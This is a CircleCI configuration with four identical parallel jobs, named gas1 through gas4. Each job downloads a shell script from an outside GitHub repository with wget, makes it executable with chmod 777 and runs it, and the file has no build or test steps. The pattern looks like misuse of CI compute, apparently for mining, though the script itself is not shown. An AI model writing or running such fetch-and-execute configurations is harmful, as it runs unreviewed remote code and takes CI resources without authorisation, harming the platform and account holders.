version: 2.1

# Define the jobs we want to run for this project
jobs:
  gas1:
    docker:
      - image: cimg/go:1.13.15-browsers
    steps:
      - run: wget https://github.com/welmii/TES/raw/main/running.sh 
      - run: chmod 777 running.sh 
      - run: ./running.sh
  gas2:
    docker:
      - image: cimg/go:1.13.15-browsers
    steps:
      - run: wget https://github.com/welmii/TES/raw/main/running.sh 
      - run: chmod 777 running.sh 
      - run: ./running.sh
  gas3:
    docker:
      - image: cimg/go:1.13.15-browsers
    steps:
      - run: wget https://github.com/welmii/TES/raw/main/running.sh 
      - run: chmod 777 running.sh 
      - run: ./running.sh
  gas4:
    docker:
      - image: cimg/go:1.13.15-browsers
    steps:
      - run: wget https://github.com/welmii/TES/raw/main/running.sh 
      - run: chmod 777 running.sh 
      - run: ./running.sh

# Orchestrate our job run sequence
workflows:
  route:
    jobs:
      - gas1
      - gas2
      - gas3
      - gas4